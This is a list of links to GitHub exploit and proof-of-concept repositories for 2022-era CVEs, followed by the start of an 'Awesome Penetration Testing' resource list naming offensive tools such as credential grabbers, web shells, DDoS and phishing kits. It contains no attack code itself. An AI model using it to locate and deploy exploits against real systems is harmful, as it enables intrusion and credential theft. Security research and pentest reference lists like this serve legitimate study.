**no description** : [HunnahRcs/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/HunnahRcs/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-08-25T18:47:38Z

**Oracle WebLogic CVE-2022-21371** : [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371) create time: 2022-08-25T14:12:33Z

**Zimbra CVE-2022-37042 Nuclei weaponized template** : [aels/CVE-2022-37042](https://github.com/aels/CVE-2022-37042) create time: 2022-08-25T10:43:13Z

**An SQL injection was discovered inOnline Diagnostic Lab Management System** : [Fjowel/CVE-2022-37152](https://github.com/Fjowel/CVE-2022-37152) create time: 2022-08-25T01:45:35Z

**There is an unauthorized access vulnerability in Online Diagnostic Lab Management System 1.0** : [Fjowel/CVE-2022-37151](https://github.com/Fjowel/CVE-2022-37151) create time: 2022-08-25T01:27:03Z

**Online Diagnostic Lab Management System Stored XSS** : [Fjowel/CVE-2022-37150](https://github.com/Fjowel/CVE-2022-37150) create time: 2022-08-25T00:58:52Z

**no description** : [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit) create time: 2022-08-24T06:00:47Z

**no description** : [nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-](https://github.com/nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-) create time: 2022-08-24T14:55:11Z

**PrintNightmare (CVE-2021-34527) PoC Exploit** : [m8sec/CVE-2021-34527](https://github.com/m8sec/CVE-2021-34527) create time: 2022-08-23T20:20:45Z

**CVE-2022-2588,CVE-2022-2586,CVE-2022-2585** : [konoha279/2022-LPE-UAF](https://github.com/konoha279/2022-LPE-UAF) create time: 2022-08-24T02:20:35Z

**RCE Exploit within the RPC Library (CVE-2022-26809)** : [F1uk369/CVE-2022-26809](https://github.com/F1uk369/CVE-2022-26809) create time: 2022-08-24T09:51:39Z

**no description** : [ZhaoQi99/CVE-2022-34265](https://github.com/ZhaoQi99/CVE-2022-34265) create time: 2022-08-24T07:29:30Z

**Internal Hostname Disclosure Vulnerability** : [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779) create time: 2022-08-24T07:58:45Z

**multi vuls of odlms** : [Fjowel/CVE-2022-37150-CVE-2022-37151-CVE-2022-37152](https://github.com/Fjowel/CVE-2022-37150-CVE-2022-37151-CVE-2022-37152) create time: 2022-08-24T02:43:22Z

**no description** : [hanch7274/CVE-2021-36749](https://github.com/hanch7274/CVE-2021-36749) create time: 2022-08-24T02:01:17Z

**There is a XSS vulnerability in Artica Proxy 4.30.000000** : [Fjowel/CVE-2022-37153](https://github.com/Fjowel/CVE-2022-37153) create time: 2022-08-24T02:17:37Z

**no description** : [irwx777/CVE-2022-0847](https://github.com/irwx777/CVE-2022-0847) create time: 2022-08-24T00:06:15Z

**CVE-2022-2588,CVE-2022-2586,CVE-2022-2585** : [pirenga/2022-LPE-UAF](https://github.com/pirenga/2022-LPE-UAF) create time: 2022-08-23T13:23:29Z

**Cortex XDR PoC ft. CVE-2021-3560** : [mikefak/XDR-PoC](https://github.com/mikefak/XDR-PoC) create time: 2022-08-23T18:57:21Z

**CVE-2022-2588** : [ASkyeye/2022-LPE-UAF](https://github.com/ASkyeye/2022-LPE-UAF) create time: 2022-08-22T23:42:00Z

**no description** : [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947) create time: 2022-08-23T06:38:46Z

**CVE-2022-2588** : [greek0x0/2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF) create time: 2022-08-22T23:08:40Z

**THE FINAL POC FOR CVE-2022-26809 TO ACHIEVE RCE** : [ToomArni65/CVE-2022-26809-RCE](https://github.com/ToomArni65/CVE-2022-26809-RCE) create time: 2022-08-22T16:09:50Z

**no description** : [ahajnik/CVE-2022-34919](https://github.com/ahajnik/CVE-2022-34919) create time: 2022-08-16T16:39:17Z

**The test report of this exploit.** : [baka9moe/CVE-2021-3156-TestReport](https://github.com/baka9moe/CVE-2021-3156-TestReport) create time: 2022-08-22T09:36:14Z

**CVE-2022-26134-Console** : [shiftsansan/CVE-2022-26134-Console](https://github.com/shiftsansan/CVE-2022-26134-Console) create time: 2022-08-22T09:40:43Z

**no description** : [peanut-cc/CVE-2022-36446](https://github.com/peanut-cc/CVE-2022-36446) create time: 2022-08-22T09:16:02Z

**WordPress JSmol2WP Plugin 1.07版本中存在安全漏洞。攻击者可利用该漏洞读取任意文件。** : [Henry4E36/CVE-2018-20463](https://github.com/Henry4E36/CVE-2018-20463) create time: 2022-08-22T00:37:14Z

**no description** : [PyterSmithDarkGhost/IoT-CVE202227255](https://github.com/PyterSmithDarkGhost/IoT-CVE202227255) create time: 2022-08-21T19:41:55Z

**This is a modified version of the original GhostCat Exploit** : [YounesTasra-R4z3rSw0rd/CVE-2020-1938](https://github.com/YounesTasra-R4z3rSw0rd/CVE-2020-1938) create time: 2022-08-21T15:44:45Z

**This is a script for version detection of Webmin remote server interface.** : [monzaviman/CVE_2022_36446](https://github.com/monzaviman/CVE_2022_36446) create time: 2022-08-21T10:35:50Z

**awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811** : [s-index/CVE-2021-43811](https://github.com/s-index/CVE-2021-43811) create time: 2022-08-21T08:44:31Z

**CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸** : [yoeelingBin/CVE-2022-0847-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0847-Container-Escape) create time: 2022-08-18T03:06:15Z

**CVE_2021_24212** : [EmmanuelCruzL/CVE_2021_24212](https://github.com/EmmanuelCruzL/CVE_2021_24212) create time: 2022-08-20T22:06:47Z

**Zimbra CVE-2022-27925** : [Josexv1/CVE-2022-27925](https://github.com/Josexv1/CVE-2022-27925) create time: 2022-08-20T15:58:29Z

**no description** : [navokus/CVE-2022-27925](https://github.com/navokus/CVE-2022-27925) create time: 2022-08-20T11:01:05Z

**PKEXEC Shell Executor for CVE-2021-4034 Pwnkit** : [Naughty-SEC/pkexec-shell-executor](https://github.com/Naughty-SEC/pkexec-shell-executor) create time: 2022-08-20T05:31:59Z

**no description** : [mistymntncop/CVE-2022-1802](https://github.com/mistymntncop/CVE-2022-1802) create time: 2022-08-20T03:01:30Z

**PoC Advanced Comment System 1.0 - Remote Command Execution (RCE)** : [hupe1980/CVE-2009-4623](https://github.com/hupe1980/CVE-2009-4623) create time: 2022-08-19T09:46:03Z

**no description** : [miko550/CVE-2022-27925](https://github.com/miko550/CVE-2022-27925) create time: 2022-08-19T04:46:08Z

**CVE-2018-0798复现** : [Sunqiz/CVE-2018-0798-reproduction](https://github.com/Sunqiz/CVE-2018-0798-reproduction) create time: 2022-08-19T02:17:50Z

**no description** : [xpgdgit/CVE-2022-31793](https://github.com/xpgdgit/CVE-2022-31793) create time: 2022-08-19T01:42:08Z

**no description** : [superhac/CVE-2022-2414-POC](https://github.com/superhac/CVE-2022-2414-POC) create time: 2022-08-18T19:58:53Z

**no description** : [GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925](https://github.com/GreyNoise-Intelligence/Zimbra_CVE-2022-37042-_CVE-2022-27925) create time: 2022-08-18T18:39:39Z

**Example payload for CVE-2022-21894** : [sm0ke1337/CVE-2022-21894-Payload](https://github.com/sm0ke1337/CVE-2022-21894-Payload) create time: 2022-08-18T13:37:56Z

**no description** : [tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228) create time: 2022-08-18T07:27:32Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229) create time: 2022-08-18T07:02:43Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224) create time: 2022-08-18T06:04:41Z

**A powershell poc to load and automatically run Certify and Rubeus from memory.** : [lsecqt/CVE-2022-26923-Powershell-POC](https://github.com/lsecqt/CVE-2022-26923-Powershell-POC) create time: 2022-08-17T21:13:49Z

**BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetooth Classic and Bluetooth Low Energy [CVE-2020-15802] [CVE-2022-20361]** : [francozappa/blur](https://github.com/francozappa/blur) create time: 2022-08-17T19:05:38Z

**Exploits of different CVE IDs (CVE-2021-37910, CVE-2021-40288, CVE-2021-41435, CVE-2021-41436, CVE-2021-41437, CVE-2021-41441, CVE-2021-41442, CVE-2021-41445, CVE-2021-41449, CVE-2021-41450, CVE-2021-41451, CVE-2021-41753, CVE-2021-41788, CVE-2021-46353)** : [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits) create time: 2022-05-27T21:09:03Z

**Remote code execution in CA APM Team Center (Wily Introscope)** : [gquere/CVE-2020-6364](https://github.com/gquere/CVE-2020-6364) create time: 2022-08-17T12:57:29Z

**This is working POC of CVE-2022-36271** : [SaumyajeetDas/POC-of-CVE-2022-36271](https://github.com/SaumyajeetDas/POC-of-CVE-2022-36271) create time: 2022-08-16T19:48:36Z

**no description** : [kenyon-wong/cve-2022-3452](https://github.com/kenyon-wong/cve-2022-3452) create time: 2022-08-16T17:48:12Z

**no description** : [a1ise/CVE-2022-29247](https://github.com/a1ise/CVE-2022-29247) create time: 2022-08-16T14:06:15Z

**no description** : [nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20223](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20223) create time: 2022-08-16T12:21:34Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229) create time: 2022-08-16T12:08:11Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224) create time: 2022-08-16T11:14:27Z

**HTTP3-attacks (CVE-2022-30592)** : [efchatz/HTTP3-attacks](https://github.com/efchatz/HTTP3-attacks) create time: 2022-08-06T09:57:43Z

**no description** : [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789) create time: 2022-05-25T01:20:14Z

**no description** : [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163) create time: 2022-08-15T20:43:53Z

**no description** : [MaherAzzouzi/CVE-2022-36162](https://github.com/MaherAzzouzi/CVE-2022-36162) create time: 2022-08-15T20:36:51Z

**ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión** : [Ly0nt4r/CVE-2020-9496](https://github.com/Ly0nt4r/CVE-2020-9496) create time: 2022-08-15T18:15:11Z

**### **Awesome Penetration Testing** [![Links Check](https://4.bp.blogspot.com/-_NIGc5XKpSw/WHt9d7wCXaI/AAAAAAAAB0o/OYIv8EWjIoYh44jfxIRSrRYbgrn3MZKEQCLcB/s1600/penetration%2Btesting.png)](http://kalitut.com) [![10 Common Hacking Techniques](http://img.youtube.com/vi/V3CTfJ2ZP7M/0.jpg)](http://www.youtube.com/watch?v=V3CTfJ2ZP7M "10 Common Hacking Techniques") A collection of awesome penetration testing resources - [Online Resources](#online-resources) - [Penetration Testing Resources](#penetration-testing-resources) - [Exploit development](#exploit-development) - [Social Engineering Resources](#social-engineering-resources) - [Lock Picking Resources](#lock-picking-resources) - [Tools](#tools) - [Penetration Testing Distributions](#penetration-testing-distributions) - [Basic Penetration Testing Tools](#basic-penetration-testing-tools) - [Docker for Penetration Testing](#docker-for-penetration-testing) - [Vulnerability Scanners](#vulnerability-scanners) - [Network Tools](#network-tools) - [Wireless Network Tools](#wireless-network-tools) - [SSL Analysis Tools](#ssl-analysis-tools) - [Web exploitation](#web-exploitation) - [Hex Editors](#hex-editors) - [Crackers](#crackers) - [Windows Utils](#windows-utils) - [Linux Utils](#linux-utils) - [DDoS Tools](#ddos-tools) - [Social Engineering Tools](#social-engineering-tools) - [OSInt Tools](#osint-tools) - [Anonymity Tools](#anonymity-tools) - [Reverse Engineering Tools](#reverse-engineering-tools) - [CTF Tools](#ctf-tools) - [Books](#books) - [Penetration Testing Books](#penetration-testing-books) - [Hackers Handbook Series](#hackers-handbook-series) - [Defensive Development](#defensive-development) - [Network Analysis Books](#network-analysis-books) - [Reverse Engineering Books](#reverse-engineering-books) - [Malware Analysis Books](#malware-analysis-books) - [Windows Books](#windows-books) - [Social Engineering Books](#social-engineering-books) - [Lock Picking Books](#lock-picking-books) - [Vulnerability Databases](#vulnerability-databases) - [Security Courses](#security-courses) - [Information Security Conferences](#information-security-conferences) - [Information Security Magazines](#information-security-magazines) ### Online Resources #### Penetration Testing Resources * [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course * [PTES](http://www.pentest-standard.org/) - Penetration Testing Execution Standard * [OWASP](https://www.owasp.org/index.php/Main_Page) - Open Web Application Security Project * [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - A free online security knowledge library for pentesters / researchers. * [Vulnerability Assessment Framework](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Penetration Testing Framework. * [The Pentesters Framework](https://github.com/trustedsec/ptf) - PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. #### Exploit development * [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode * [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database * [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits * [shellsploit](https://github.com/b3mb4m/shellsploit-framework) - New Generation Exploit Development Kit * [Voltron](https://github.com/snare/voltron) - A hacky debugger UI for hackers #### Social Engineering Resources * [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - An information resource for social engineers #### Lock Picking Resources * [Schuyler Towne channel](https://www.youtube.com/user/SchuylerTowne/) - Lockpicking videos and security talks * [/r/lockpicking](https://www.reddit.com/r/lockpicking) - Resources for learning lockpicking, equipment recommendations. ### Tools #### Penetration Testing Distributions * [Kali](https://www.kali.org/) - A Linux distribution designed for digital forensics and penetration testing * [ArchStrike](https://archstrike.org/) - An Arch Linux repository for security professionals and enthusiasts * [BlackArch](https://www.blackarch.org/) - Arch Linux-based distribution for penetration testers and security researchers * [NST](http://networksecuritytoolkit.org/) - Network Security Toolkit distribution * [Pentoo](http://www.pentoo.ch/) - Security-focused livecd based on Gentoo * [BackBox](https://backbox.org/) - Ubuntu-based distribution for penetration tests and security assessments * [Parrot](https://www.parrotsec.org/) - A distribution similar to Kali, with multiple architecture * [Fedora Security Lab](https://labs.fedoraproject.org/en/security/) - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies. #### Basic Penetration Testing Tools * [Metasploit Framework](https://www.metasploit.com/) - World's most used penetration testing software * [Burp Suite](https://portswigger.net/burp/) - An integrated platform for performing security testing of web applications * [ExploitPack](http://exploitpack.com/) - Graphical tool for penetration testing with a bunch of exploits * [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project * [faraday](https://github.com/infobyte/faraday) - Collaborative Penetration Test and Vulnerability Management Platform * [evilgrade](https://github.com/infobyte/evilgrade) - The update explotation framework * [commix](https://github.com/stasinopoulos/commix) - Automated All-in-One OS Command Injection and Exploitation Tool * [routersploit](https://github.com/reverse-shell/routersploit) - Automated penetration testing software for router * [redsnarf] (https://github.com/nccgroup/redsnarf) - Post-exploitation tool for grabbing credentials #### Docker for Penetration Testing * `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) * `docker pull owasp/zap2docker-stable` - [official OWASP ZAP](https://github.com/zaproxy/zaproxy) * `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) * `docker pull pandrew/metasploit` - [docker-metasploit](https://hub.docker.com/r/pandrew/metasploit/) * `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) * `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) * `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) * `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) * `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) * `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/) * `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) * `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) * `docker-compose build && docker-compose up` - [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) * `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) * `docker pull bkimminich/juice-shop` - [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--) #### Vulnerability Scanners * [Nexpose](https://www.rapid7.com/products/nexpose/) - Vulnerability Management & Risk Management Software * [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) - Vulnerability, configuration, and compliance assessment * [Nikto](https://cirt.net/nikto2) - Web application vulnerability scanner * [OpenVAS](http://www.openvas.org/) - Open Source vulnerability scanner and manager * [OWASP Zed Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - Penetration testing tool for web applications * [Secapps](https://secapps.com/) - Integrated web application security testing environment * [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework * [Wapiti](http://wapiti.sourceforge.net/) - Web application vulnerability scanner * [WebReaver](http://www.webreaver.com/) - Web application vulnerability scanner for Mac OS X * [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR * [arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework #### Network Tools * [nmap](https://nmap.org/) - Free Security Scanner For Network Exploration & Security Audits * [pig](https://github.com/rafael-santiago/pig) - A Linux packet crafting tool * [tcpdump/libpcap](http://www.tcpdump.org/) - A common packet analyzer that runs under the command line * [Wireshark](https://www.wireshark.org/) - A network protocol analyzer for Unix and Windows * [Network Tools](http://network-tools.com/) - Different network tools: ping, lookup, whois, etc * [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - A Swiss army knife for for network sniffing * [Intercepter-NG](http://sniff.su/) - a multifunctional network toolkit * [SPARTA](http://sparta.secforce.com/) - Network Infrastructure Penetration Testing Tool * [dnschef](http://thesprawl.org/projects/dnschef/) - A highly configurable DNS proxy for pentesters * [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service * [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results * [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper * [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS Enumeration Script * [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers * [passivedns-client](https://github.com/chrislee35/passivedns-client) - Provides a library and a query tool for querying several passive DNS providers * [passivedns](https://github.com/gamelinux/passivedns) - A network sniffer that logs all DNS server replies for use in a passive DNS setup * [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. * [Zarp](https://github.com/hatRiot/zarp) - Zarp is a network attack tool centered around the exploitation of local networks * [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers * [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH * [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols * [DET](https://github.com/sensepost/DET) - DET is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time * [pwnat](https://github.com/samyk/pwnat) - punches holes in firewalls and NATs * [dsniff](https://www.monkey.org/~dugsong/dsniff/) - a collection of tools for network auditing and pentesting * [tgcd](http://tgcd.sourceforge.net/) - a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls * [smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool * [scapy](https://github.com/secdev/scapy) - a python-based interactive packet manipulation program & library * [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework * [Debookee (MAC OS X)](http://www.iwaxx.com/debookee/) - Intercept traffic from any device on your network * [Dripcap](https://github.com/dripcap/dripcap) - Caffeinated packet analyzer #### Wireless Network Tools * [Aircrack-ng](http://www.aircrack-ng.org/) - a set of tools for auditing wireless network * [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS * [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against Wifi Protected Setup * [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool * [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against Wi-Fi networks #### SSL Analysis Tools * [SSLyze](https://github.com/nabla-c0d3/sslyze) - SSL configuration scanner * [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - a demonstration of the HTTPS stripping attacks * [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS * [tls_prober](https://github.com/WestpointLtd/tls_prober) - fingerprint a server's SSL/TLS implementation #### Web exploitation * [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner * [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool * [weevely3](https://github.com/epinna/weevely3) - Weaponized web shell * [Wappalyzer](https://wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites * [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. * [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla CMS scanner * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website Fingerprinter * [BlindElephant](http://blindelephant.sourceforge.net/) - Web Application Fingerprinter * [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even google automatically for LFI/RFI bugs * [Kadabra](https://github.com/D35m0nd142/Kadabra) - Automatic LFI exploiter and scanner * [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool * [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool #### Hex Editors * [HexEdit.js](https://hexed.it) - Browser-based hex editing * [Hexinator](https://hexinator.com/) (commercial) - World's finest Hex Editor * [HxD - Freeware Hex Editor and Disk Editor](https://mh-nexus.de/en/hxd/) #### Crackers * [John the Ripper](http://www.openwall.com/john/) - Fast password cracker * [Online MD5 cracker](http://www.md5crack.com/) - Online MD5 hash Cracker * [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker * [THC Hydra](http://sectools.org/tool/hydra/) - Another Great Password Cracker #### Windows Utils * [Sysinternals Suite](https://technet.microsoft.com/en-us/sysinternals/bb842062) - The Sysinternals Troubleshooting Utilities * [Windows Credentials Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/) - security tool to list logon sessions and add, change, list and delete associated credentials * [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows OS * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework * [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target * [Responder](https://github.com/SpiderLabs/Responder) - A LLMNR, NBT-NS and MDNS poisoner * [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - A graphical Active Directory trust relationship explorer * [Empire](https://github.com/PowerShellEmpire/Empire) - Empire is a pure PowerShell post-exploitation agent * [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel #### Linux Utils * [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Linux Exploit Suggester; based on operating system release number. #### DDoS Tools * [LOIC](https://github.com/NewEraCracker/LOIC/) - An open source network stress tool for Windows * [JS LOIC](http://metacortexsecurity.com/tools/anon/LOIC/LOICv1.html) - JavaScript in-browser version of LOIC * [T50](https://sourceforge.net/projects/t50/) - The more fast network stress tool #### Social Engineering Tools * [SET](https://github.com/trustedsec/social-engineer-toolkit) - The Social-Engineer Toolkit from TrustedSec #### OSInt Tools * [Maltego](http://www.paterva.com/web7/) - Proprietary software for open source intelligence and forensics, from Paterva. * [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester * [creepy](https://github.com/ilektrojohn/creepy) - A geolocation OSINT tool * [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester * [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - a database of Google dorks; can be used for recon * [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans * [Shodan](https://www.shodan.io/) - Shodan is the world's first search engine for Internet-connected devices * [recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) - A full-featured Web Reconnaissance framework written in Python * [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan github repos/organizations for potential sensitive information leak * [vcsmap](https://github.com/melvinsh/vcsmap) - A plugin-based tool to scan public version control systems for sensitive information * [Spiderfoot](http://www.spiderfoot.net/) - multi-source OSINT automation tool with a Web UI and report visualizations #### Anonymity Tools * [Tor](https://www.torproject.org/) - The free software for enabling onion routing online anonymity * [I2P](https://geti2p.net/en/) - The Invisible Internet Project * [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network. #### Reverse Engineering Tools * [IDA Pro](https://www.hex-rays.com/products/ida/) - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger * [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml) - The freeware version of IDA v5.0 * [WDK/WinDbg](https://msdn.microsoft.com/en-us/windows/hardware/hh852365.aspx) - Windows Driver Kit and WinDbg * [OllyDbg](http://www.ollydbg.de/) - An x86 debugger that emphasizes binary code analysis * [Radare2](http://rada.re/r/index.html) - Opensource, crossplatform reverse engineering framework * [x64_dbg](http://x64dbg.com/) - An open-source x64/x32 debugger for windows * [Immunity Debugger](http://debugger.immunityinc.com/) - A powerful new way to write exploits and analyze malware * [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for Linux * [Medusa disassembler](https://github.com/wisk/medusa) - An open source interactive disassembler * [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code * [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB * [dnSpy](https://github.com/0xd4d/dnSpy) - dnSpy is a tool to reverse engineer .NET assemblies #### CTF Tools * [Pwntools](https://github.com/Gallopsled/pwntools) - CTF framework for use in CTFs ### Books #### Penetration Testing Books * [The Art of Exploitation by Jon Erickson, 2008](http://amzn.to/2iqhK9S) * [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](http://amzn.to/2jl5pUd) * [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](http://amzn.to/2jMfK8i) * [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://amzn.to/2iz9K4Y) * [The Hacker Playbook 2: Practical Guide To Penetration Testing](http://amzn.to/2jMdNbU) * [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](http://amzn.to/2jMgMkj) * [Professional Penetration Testing by Thomas Wilhelm, 2013](http://amzn.to/2jMq9AI) * [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://amzn.to/2jl6GKU) * [Violent Python by TJ O'Connor, 2012](http://amzn.to/2jMbTYy) * [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://amzn.to/2izbgDS) * [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://amzn.to/2jl5FCk) * [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://amzn.to/2izaBmc) * [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://amzn.to/2izcwqI) * [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://amzn.to/2iqoyEj) * [Bug Hunter's Diary by Tobias Klein, 2011](http://amzn.to/2jkYHO2) #### Hackers Handbook Series * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://amzn.to/2jlcqEB) * [The Shellcoders Handbook by Chris Anley et al., 2007](http://amzn.to/2iudxwQ) * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://amzn.to/2jSUpxO) * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://amzn.to/2jl0rGQ) * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://amzn.to/2jMpWO4) * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://amzn.to/2jmN5tg) * [The Browser 